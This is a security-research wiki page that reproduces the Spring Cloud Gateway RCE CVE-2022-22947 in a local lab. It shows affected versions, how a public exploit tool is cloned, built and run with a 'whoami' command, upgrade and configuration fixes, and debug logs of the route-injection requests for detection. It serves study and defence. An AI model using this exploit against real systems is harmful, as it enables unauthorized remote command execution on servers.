CVE-2022-22947 Spring-Cloud-Gateway-RCE | © 哨兵

GITLAB

I. GITLAB CVE-2020-10977 任意文件读取漏洞

II. GITLAB CVE-2020-10977 任意文件读取漏洞导致的RCE

III. GITLAB CVE-2021-22205 SNIPPET RCE

COBALT STRIKE

I. COBALT STRIKE服务器搭建历程

II. COBALT STRIKE服务器隐藏真实IP

III. CS上线木马免杀入门

APACHE LOG4J2

I. APACHE LOG4J2 RCE复现历程

II. APACHE LOG4J2 RCE JDK限制实验

OCR IN BP

I. BURPSUITE验证码插件实验

GET-STARTED

I. GET-STARTED

CTF

I. CTF - 代码审计向

II. CTF - 杂项

III. CTF - 密码学与杂项

IV. 2022年网鼎杯玄武组-解题记录

V. 2022年网鼎杯玄武组赛题复盘-[WEB-FINDIT]

VI. 2022年网鼎杯玄武组赛题复盘-[WEB-EZJAVA]

二进制研究/BIN

I. HIKVISION-CONFIGURATIONFILES-DECRYPTER

II. ROUTER-BINFILE-ANALYSIS

POLKIT

I. POLKIT-CVE-2021-3560

II. POLKIT-CVE-2021-4034复现

代理池：BASED ON SCYLLA

I. SCYLLA 搭建步骤

WAF

I. MOD-WAF-BYPASS-WALKTHROUGH

II. MODSEC & CLOUDFLARE WAF INITIAL RESEARCH

代码审计

I. DYNAMIC-ANALYSIS-OF-JAVA-FRAMEWORK-CODE

II. 安全与开发之：MAVEN构建排错

III. 浪潮CLUSTERENGINEV4.0代码审计历程

IV. CVE-2022-40664 SHIRO BYPASS研究历程

SPRING

I. SPRINGBOOT-MEMORY-FILES-HEAPDUMP-ANALYSIS

II. CVE-2022-22947 SPRING-CLOUD-GATEWAY-RCE

其他研究

I. SQL注入原理分析

II. STRUTS2DESER

III. 基于内存的SHIRO框架WEBSHELL攻击研究

IV. 通达OA利用代码分析

V. JRMP-GADGET

反序列化

I. SHIRODESER

II. JAVADESER

sentrylab.cn /

研究
/

Spring

Bin4xin

edited
on Feb 24, 2023

开源项目 Spring Cloud Gateway 的一个远程代码执行漏洞编号为 CVE-2022-22947

受影响的版本为：

3.1.0
3.0.0 到 3.0.6
旧的不受支持的版本也受影响

漏洞挖掘

靶场：

java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar --debug

  .   ____          _            __ _ _
 /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
 \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
  '  |____| .__|_| |_|_| |_\__, | / / / /
 =========|_|==============|___/=/_/_/_/
 :: Spring Boot ::       (v2.6.3-SNAPSHOT)
 
 Netty started on port 9000

gateway 网关关键词

$ curl http://localhost:9000/actuator

{"_links":{"self":{"href":"http://localhost:9000/actuator","templated":false},"gateway":{"href":"http://localhost:9000/actuator/gateway","templated":false}}}

exp

原仓库

$ git remote -v
origin	https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (fetch)
origin	https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (push)

$ go build main.go
go: downloading github.com/panjf2000/ants/v2 v2.4.8
go: downloading github.com/go-resty/resty/v2 v2.7.0
go: downloading golang.org/x/net v0.0.0-20211029224645-99673261e6eb

$ ./main -u http://127.0.0.1:9000 -c whoami
http://127.0.0.1:9000  'bin4xin\n'

修复方案

3.1.x 版本用户应升级到 3.1.1+ 版本，3.0.x 版本用户应升级到 3.0.7+ 版本。
在不影响业务的前提下，通过将配置选项 management.endpoint.gateway.enabled 设置为 false 禁用 gateway actuator endpoint。

检测思路

流量检测：分析 HTTP 流量，检测是否存在异常访问 actuator gateway API 的请求。

2022-03-15 10:22:26.711 DEBUG 11029 --- [ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter    : [68b629bb-1] HTTP POST "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-2] a.e.w.r.ControllerEndpointHandlerMapping : [68b629bb-1] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#save(String, RouteDefinition)
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] Content-Type:application/json
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] 0..1 [org.springframework.cloud.gateway.route.RouteDefinition]
[ctor-http-nio-2] o.s.http.codec.json.Jackson2JsonDecoder  : [68b629bb-1] Decoded [RouteDefinition{id='LZQXX', predicates=[], filters=[FilterDefinition{name='AddResponseHeader', args= (truncated)...]
[ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter    : [68b629bb-1] Completed 201 CREATED
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter    : [36032421-2] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-3] a.e.w.r.ControllerEndpointHandlerMapping : [36032421-2] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter    : [36032421-2] Completed 200 OK
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter    : [9763438e-3] HTTP GET "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-4] a.e.w.r.ControllerEndpointHandlerMapping : [9763438e-3] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#route(String)
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] Using 'application/json' given [*/*] and supported [application/json, application/*+json, application/x-ndjson, text/event-stream]
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] 0..1 [java.util.Map<java.lang.String, java.lang.Object>]
[ctor-http-nio-4] o.s.http.codec.json.Jackson2JsonEncoder  : [9763438e-3] Encoding [{predicate=RouteDefinitionRouteLocator$$Lambda$918/2002125647, route_id=LZQXX, filters=[[[AddRespons (truncated)...]
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter    : [9763438e-3] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-4] HTTP DELETE "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-4] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#delete(String)
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-4] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-5] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-5] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter    : [1f92a2eb-5] Completed 200 OK

以上。

Print document Edit on github

漏洞挖掘

exp

修复方案

检测思路

参考